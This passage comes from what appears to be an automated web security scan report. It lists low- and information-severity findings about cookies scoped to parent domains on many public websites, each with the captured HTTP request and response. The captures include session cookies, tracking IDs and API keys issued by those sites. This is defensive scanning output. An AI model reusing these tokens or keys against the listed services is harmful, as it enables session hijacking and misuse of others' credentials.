The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.genealogy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:17:39 GMT
Server: Apache
Set-Cookie: SessionID=991df4142c2bdfff4d973003; path=/; domain=.genealogy.com; expires=Friday, 31-Dec-2010 23:59:59 GMT
Set-Cookie: GComStoreData=%0ASIT%3D001f39142c56ebff4d973003; domain=.genealogy.com; path=/;
X-ServerName: SN:gweb07:
Last-Modified: Thu, 03 May 2007 15:39:07 GMT
ETag: "297817-e36-463a021b"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerwww.genealogy.com=119122112.20480.0000; path=/

...[SNIP]...

13.5. http://www.mapquest.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mapquest.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="JLUHhthGQfnS1TgXuuJQmiORiO8="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Sat, 02-Apr-2011 13:07:30 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Sat, 02-Apr-2011 12:52:30 GMT; Path=/
Set-Cookie: psession="UdOt/zUW/PqyIT51eoLXfzOifpQ="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Fri, 01-Jul-2011 12:37:30 GMT; Path=/
Set-Cookie: c_Id=MjMzOjM5Mw%3D%3D; Expires=Sat, 02-Apr-2011 13:07:30 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"1150-1301684392000"
Last-Modified: Fri, 01 Apr 2011 18:59:52 GMT
Content-Type: image/x-icon
Content-Length: 1150
Date: Sat, 02 Apr 2011 12:37:30 GMT

...[SNIP]...

13.6. http://www.mayoclinic.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mayoclinic.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mayoclinic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 file not found
Connection: close
Date: Sat, 02 Apr 2011 13:24:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=5216401;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:24:13 GMT;path=/
Set-Cookie: CFTOKEN=31014280;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:24:13 GMT;path=/
Set-Cookie: JSESSIONID=b230124a654d7a3c162276d7e9525c59751d;path=/
Set-Cookie: CURRENTFARCRYPROJECT=dotcom;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

   <title>Page not found - MayoClinic.com</title>
   <meta name="description" conten
...[SNIP]...

13.7. http://www.musiciansfriend.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.musiciansfriend.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.musiciansfriend.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server:
Last-Modified: Fri, 15 Jan 2010 23:11:32 GMT
Accept-Ranges: bytes
Content-Length: 1406
X-Cnection: close
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=269732
Expires: Tue, 05 Apr 2011 16:35:34 GMT
Date: Sat, 02 Apr 2011 13:40:02 GMT
Connection: close
Set-Cookie: AKA-SESSION=35ce8f185c5000003227974d69c20a00849f0000; path=/; domain=musiciansfriend.com
Set-Cookie: OMTR-AKAID=35ce8f185c5000003227974d69c20a00859f0000; expires=Sun, 06-Mar-2016 13:40:02 GMT; path=/; domain=musiciansfriend.com
Set-Cookie: AKA-SESSION-5D=35ce8f185c5000003227974d69c20a00869f0000; expires=Thu, 07-Apr-2011 13:40:02 GMT; path=/; domain=musiciansfriend.com

...[SNIP]...

13.8. http://www.ning.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ning.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ning.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
X-XN-Trace-Token: 9f9c1c9c-5fa1-4bab-8993-14577ccb4134
Server: Ning HTTP Server 2.0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=c5369740-b729-45ac-ba3a-bbb4c515e644;Path=/;Domain=.ning.com;Expires=Tue, 30-Mar-21 13:24:47 GMT
Set-Cookie: ning_session="nAHWdTfdOjMut3QNynKqxXypQ/m+CjPKz2Xk0bPPyn9b46CDeXF+vx+gkz8Znwi2UfKCwpXcPW8=";Path=/;Domain=ning.com;Expires=Sat, 02-Apr-11 14:24:47 GMT
XN-ResponseFrom: 10.16.33.64,(10.16.106.52,200,6)
Date: Sat, 02 Apr 2011 13:24:47 GMT
Last-Modified: Thu, 31 Mar 2011 23:15:59 GMT
ETag: "408973-57e-49fcf79e5e9c0"
Accept-Ranges: bytes
Content-Type: image/x-icon
Cache-Control: max-age=0
Content-Length: 1406

...[SNIP]...

13.9. http://www.pronto.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.pronto.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pronto.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:43 GMT
Server: Apache/2.2.4 (Fedora)
Set-Cookie: JSESSIONID=612608DD194E2650C96F7544861E8212; Path=/
Set-Cookie: SESSIONID=1390698434; Domain=.pronto.com; Path=/
Set-Cookie: abt=ProntoV3_5_7-1.185-cellNum_2; Domain=.pronto.com; Expires=Mon, 02-May-2011 13:23:43 GMT; Path=/
Set-Cookie: M_ID=-4f77939a-12f1647631d-28ef; Domain=.pronto.com; Expires=Mon, 01-Apr-2013 13:23:43 GMT; Path=/
Set-Cookie: V_ID=-4f77939a-12f1647631d-28f0; Domain=.pronto.com; Path=/
ETag: W/"1150-1273607942000"
Last-Modified: Tue, 11 May 2010 19:59:02 GMT
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Via: CN-5000
Proxy-Connection: Keep-Alive

...[SNIP]...

13.10. http://www.softonic.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.softonic.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.softonic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:05 GMT
Server: Apache
Expires: Thu, 07 Apr 2011 19:10:17 GMT
Cache-Control: max-age=451872, public
Last-Modified: Thu, 31 Mar 2011 19:10:17 GMT
ETag: "7cb651b31ce3c119df9a7081244f7ee6"
Set-Cookie: softonic_es-admin=deleted; expires=Fri, 02-Apr-2010 13:39:04 GMT; path=/; domain=softonic.com
Set-Cookie: PHPSESSID=2e29be89a8385992f825d6f55520437d; path=/; domain=softonic.com
Content-Length: 1150
Vary: Accept-Encoding,User-Agent
Content-Type: image/x-icon

...[SNIP]...

13.11. http://www.thisis50.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.thisis50.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thisis50.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:19 GMT
Server: Jetty/5.1.15 (SunOS/5.10 x86 java/1.6.0_03
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=72496530-32a2-4001-aeeb-9a7e9872eab2;Path=/;Domain=.thisis50.com;Expires=Tue, 30-Mar-21 14:10:19 GMT
Set-Cookie: ning_session=hYUinaZPS4PpTu5L6SBL+6WnXz1ReXkZONMjZKkPvji77oXBafO3wf3mrh+eSamL2/SqG6uHda4=;Path=/;Domain=.thisis50.com;Expires=Sat, 02-Apr-11 15:10:19 GMT
X-XN-Trace-Token: a9fbec7b-7dd0-41ce-b9e7-d77a0f275cdc
ETag: "84997-483-45a8520a9ed00"
Date: Sat, 02 Apr 2011 14:09:47 GMT
Date: Sat, 02 Apr 2011 14:09:47 GMT
Vary: X-XN_APPLICATION
P3P: CP="UNI STA LOC CURa OURa COR ALL IND"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Fri, 31 Oct 2008 04:35:32 GMT
CACHE-CONTROL: max-age=0
CACHE-CONTROL: no-cache="Set-Cookie"
Content-Type: image/x-icon
Accept-Ranges: bytes
Server: Ning HTTP Server 2.0
Content-Length: 1155

...[SNIP]...

13.12. http://www.worthpoint.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.worthpoint.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.worthpoint.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:54 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: wp_session=173.193.214.243.1301751474503452; path=/; domain=.worthpoint.com
Last-Modified: Mon, 13 Apr 2009 18:38:55 GMT
ETag: "17b85c4-13e-4677406cfedc0"
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain; charset=UTF-8

...[SNIP]...

13.13. http://maps.google.com/maps

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps?file=api&v=2&sensor=false&key=ABQIAAAAVJ-8d4AfG2CkFxRLVwO_ehTi6M0C0dLhwsIDdnxX2F6jwPoofxQBhmKRHrEcPVj3dDDnmUmbR72EXg&sfgdata=+sfgRmluamFuX1R5cGU9amF2YV9zY3JpcHQmRmluamFuX0xhbmc9dGV4dC9qYXZhc2NyaXB0+a HTTP/1.1
Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/contact-us/brighton
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=MN9SWdYxMCQkHpb_d4WQmZ3kNpxn-MU9rpOlJhbEI5Fv3qxoLHavXA9mGpZlvSgRwUfbeSkks_uJwt-RCh2wY4zw_ar14vIG6SnN2YqoOVhzrCC_k--3E7er-ItNIIG8; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301752060:GM=1:IG=3:SG=1:S=pQ1PkWLa_0C6rZC1

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301752649:GM=1:IG=3:SG=1:S=d5391Or4mtSSJS9x; expires=Mon, 01-Apr-2013 13:57:29 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 13:57:29 GMT
Server: mfe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Expires: Sat, 02 Apr 2011 13:57:29 GMT
Content-Length: 11871

var G_INCOMPAT = false;function GScript(src) {document.write('<' + 'script src="' + src + '"' +' type="text/javascript"><' + '/script>');}function GBrowserIsCompatible() {if (G_INCOMPAT) return false;
...[SNIP]...

13.14. http://maps.google.com/maps/gen_204

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/gen_204

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/gen_204?imp=maps_api_set_default_ui HTTP/1.1
Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/contact-us/brighton
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=MN9SWdYxMCQkHpb_d4WQmZ3kNpxn-MU9rpOlJhbEI5Fv3qxoLHavXA9mGpZlvSgRwUfbeSkks_uJwt-RCh2wY4zw_ar14vIG6SnN2YqoOVhzrCC_k--3E7er-ItNIIG8; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301752649:GM=1:IG=3:SG=1:S=d5391Or4mtSSJS9x

Response

HTTP/1.1 204 No Content
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301752651:GM=1:IG=3:SG=1:S=mnR2BkyBhZFvD7WE; expires=Mon, 01-Apr-2013 13:57:31 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 13:57:31 GMT
Server: mfe
Content-Length: 0
X-XSS-Protection: 1; mode=block


13.15. http://maps.google.com/maps/vp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/vp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/vp?spn=0.048799,0.102997&z=13&key=ABQIAAAAVJ-8d4AfG2CkFxRLVwO_ehTi6M0C0dLhwsIDdnxX2F6jwPoofxQBhmKRHrEcPVj3dDDnmUmbR72EXg&sensor=false&mapclient=jsapi&vp=50.82267,-0.14441 HTTP/1.1
Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/contact-us/brighton
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=MN9SWdYxMCQkHpb_d4WQmZ3kNpxn-MU9rpOlJhbEI5Fv3qxoLHavXA9mGpZlvSgRwUfbeSkks_uJwt-RCh2wY4zw_ar14vIG6SnN2YqoOVhzrCC_k--3E7er-ItNIIG8; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301752649:GM=1:IG=3:SG=1:S=d5391Or4mtSSJS9x

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:31 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301752651:GM=1:IG=3:SG=1:S=mnR2BkyBhZFvD7WE; expires=Mon, 01-Apr-2013 13:57:31 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Content-Length: 1332

GAddCopyright("m","11605834097857221387",50.7983,-0.1959,50.8471,-0.0929,13,"Tele Atlas",19,false);
window.GAppFeatures && window.GAppFeatures({cb:{bounds:[{s:50889174,w:-285645,n:50903033,e:-153809,i
...[SNIP]...

13.16. http://safebrowsing.clients.google.com/safebrowsing/downloads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /safebrowsing/downloads?client=googlechrome&appver=10.0.648.204&pver=2.2&wrkey=AKEgNiu2mFE63FMw496NljDbfuqWVUHfR5aspR9G78SPoDGBnjDblFO5_v3By_lHgdefi2qYWL0qQkqRPEgqQcEZbPgzqr3RaA== HTTP/1.1
Host: safebrowsing.clients.google.com
Proxy-Connection: keep-alive
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=MN9SWdYxMCQkHpb_d4WQmZ3kNpxn-MU9rpOlJhbEI5Fv3qxoLHavXA9mGpZlvSgRwUfbeSkks_uJwt-RCh2wY4zw_ar14vIG6SnN2YqoOVhzrCC_k--3E7er-ItNIIG8; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301746656:GM=1:IG=3:SG=1:S=-7aZMRhsTdHlesaT
Content-Length: 104

goog-malware-shavar;a:28068-35165:s:40805-47673:mac
goog-phish-shavar;a:130630-134965:s:67129-68856:mac

Response

HTTP/1.1 200 OK
Content-Type: application/vnd.google.safebrowsing-update
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301748493:GM=1:IG=3:SG=1:S=dU5RHSbYxFO9H3Ys; expires=Mon, 01-Apr-2013 12:48:13 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:48:13 GMT
Server: Chunked Update Server
Content-Length: 369
X-XSS-Protection: 1; mode=block
Expires: Sat, 02 Apr 2011 12:48:13 GMT
Cache-Control: private

m:sDWcvq3SwCNj5QAXb_7v9pezsYg=
n:1772
i:goog-malware-shavar
i:goog-phish-shavar
ad:130630-130632
u:safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchABGPiZBCD8mQQqBfoMAQAHMgX4DAE
...[SNIP]...

13.17. http://translate.google.com/translate_a/element.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_a/element.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /translate_a/element.js?cb=cr.googleTranslate.onTranslateElementLoad HTTP/1.1
Host: translate.google.com
Proxy-Connection: keep-alive
Google-Translate-Element-Mode: library
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=MN9SWdYxMCQkHpb_d4WQmZ3kNpxn-MU9rpOlJhbEI5Fv3qxoLHavXA9mGpZlvSgRwUfbeSkks_uJwt-RCh2wY4zw_ar14vIG6SnN2YqoOVhzrCC_k--3E7er-ItNIIG8; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301748493:GM=1:IG=3:SG=1:S=dU5RHSbYxFO9H3Ys

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:48:39 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Pragma: no-cache
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301748519:GM=1:IG=3:SG=1:S=BBZNQWKju3cJJqSO; expires=Mon, 01-Apr-2013 12:48:39 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 1422

(function(){var d=window,e=document;function f(b){var a=e.getElementsByTagName("head")[0];a||(a=e.body.parentNode.appendChild(e.createElement("head")));a.appendChild(b)}function _loadJs(b){var a=e.cre
...[SNIP]...

13.18. http://www.411.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.411.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.411.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Vary: Accept-Encoding
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 13:42:01 GMT
Status: 200 OK
X-Runtime: 0.02831
ETag: "28868ff376e29e9093907243f62f8121"
Connection: keep-alive
Set-Cookie: wp_endemic_provider=A; domain=.411.com; path=/; expires=Sun, 03 Apr 2011 01:42:01 GMT
Set-Cookie: wp_perm=pid%3D_LLdoF0uEeCxcgAeC-lzfg; domain=.411.com; path=/; expires=Sun, 01 Apr 2012 13:42:01 GMT
Set-Cookie: wp_qc_demo_at=gn%3D%2Cage%3D%2Cchh%3D%2Cedu%3D%2Chh%3D%2Cqn%3D; domain=.411.com; path=/; expires=Sun, 01 Apr 2012 13:42:01 GMT
Set-Cookie: _wpn_sid=7494deac6a51f7c62e310ec573d0b582; domain=.411.com; path=/
Content-Length: 16254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equi
...[SNIP]...

13.19. http://www.addresses.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addresses.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.addresses.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:10 GMT
Server: Apache
Expires: Sat, 16 Apr 2011 06:34:10 GMT
Cache-Control: public
ETag: 3df0322508f321b7cd4e730f2fa1acacb8eb1d38
Content-Type: image/x-icon
Set-Cookie: BIGipServerp-directory=922927882.20480.0000;domain=addresses.com; expires=Sat, 02-Apr-2011 15:04:10 GMT; path=/
Content-Length: 2238

...[SNIP]...

13.20. http://www.advanceautoparts.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advanceautoparts.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.advanceautoparts.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 16 Aug 2010 19:49:41 GMT
ETag: "536ae-47e-48df622227f40"-gzip
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC"
Content-Type: image/x-icon
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 14:53:19 GMT
Date: Sat, 02 Apr 2011 13:53:19 GMT
Content-Length: 1150
Connection: close
Set-Cookie: Region=DC; path=/; domain=.advanceautoparts.com
Set-Cookie: City=WASHINGTON; path=/; domain=.advanceautoparts.com
Set-Cookie: Areacode=202+703+301; path=/; domain=.advanceautoparts.com
Set-Cookie: Zip=20001-20020+20024+20026+20029-20082+20088-20091+20097-20099+20201-20245+20250-20251+20254+20260-20262+20265-20270+20277+20289+20299+20301+20303+20306-20307+20310+20314-20319+20330+20332+20336-20340+20350+20370+20372-20376+20380+20388-20395+20398+20401-20429+20431+20433-20444+20447+20451+20453+20456+20460+20463+20468-20472+20500-20510+20515+20520-20527+20530-20560+20565-20566+20570-20581+20585-20586+20590-20599; path=/; domain=.advanceautoparts.com

...[SNIP]...

13.21. http://www.alibaba.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alibaba.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.alibaba.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:24 GMT
Server: Apache/2.2.15 (Unix) mod_AliCookie(for apache2.x)/1.1 Beacon/3.2 mod_jk/1.2.28
Set-Cookie: ali_apache_id=173.193.214.243.64460051084706.7; path=/; domain=.alibaba.com; expires=Wed, 30-Nov-2084 01:01:01 GMT
Set-Cookie: ali_apache_sid=173.193.214.243.64460051084706.7|1301752884; path=/; domain=.alibaba.com
Last-Modified: Wed, 29 Dec 2010 15:54:08 GMT
ETag: "dc008-57e-4988e9451a800"
Accept-Ranges: bytes
Content-Length: 1406
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain

...[SNIP]...

13.22. http://www.americanexpress.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americanexpress.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.americanexpress.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:34 GMT
Server: IBM_HTTP_Server
